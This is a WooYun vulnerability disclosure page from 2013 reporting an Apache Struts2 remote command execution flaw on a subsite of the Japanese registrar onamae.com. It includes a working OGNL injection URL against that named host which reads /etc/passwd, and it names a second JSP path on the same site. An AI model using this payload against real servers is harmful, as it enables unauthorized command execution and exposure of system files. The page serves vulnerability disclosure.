Current:WooYun >> vulnerability information

Overview Followers (1) + Follow

WooYun-2013-00011

: Japan's largest domain name registrar a subsite remote command execution

onamae.com

Finger

: 2013-08-09 11:52

: 2013-09-23 11:53

: Arbitrary command/code execution

: medium

: 10

: unable to contact the vendor or actively neglected by the vendor

http://www.wooyun.org

command execution

0collected by people collect


Details

Disclosure time-line:

2013-08-09: Contacting and waiting for the vendor to claim, details not opened to the public
2013-09-23: Vendor has neglected the vulnerability, details opened to the public

Abstract:

Japan's largest domain name registrar a subsite remote command execution

Details:

Apache struts2 a vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution。



URL:

http://dom.onamae.com/biglobe-ddns/detail.do



Proofs of concept:

http://dom.onamae.com/biglobe-ddns/detail.do?redirect:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}



http://dom.onamae.com/biglobe-ddns/s.jsp



QQ截图20130806150845.jpg

Solutions:

updata

Copyright:Please repost with source Finger@Wooyun


Response

Unable to contact the vendor or has been regected


review the vulnerability:

Give your review of the vulnerability in order to reflect its value better. Reviews can include the subjectivity, complecity, as well as the scholar value of the information.

(0 comments):
You need to sign in to comment

Comments

Want to comment? Please sign in .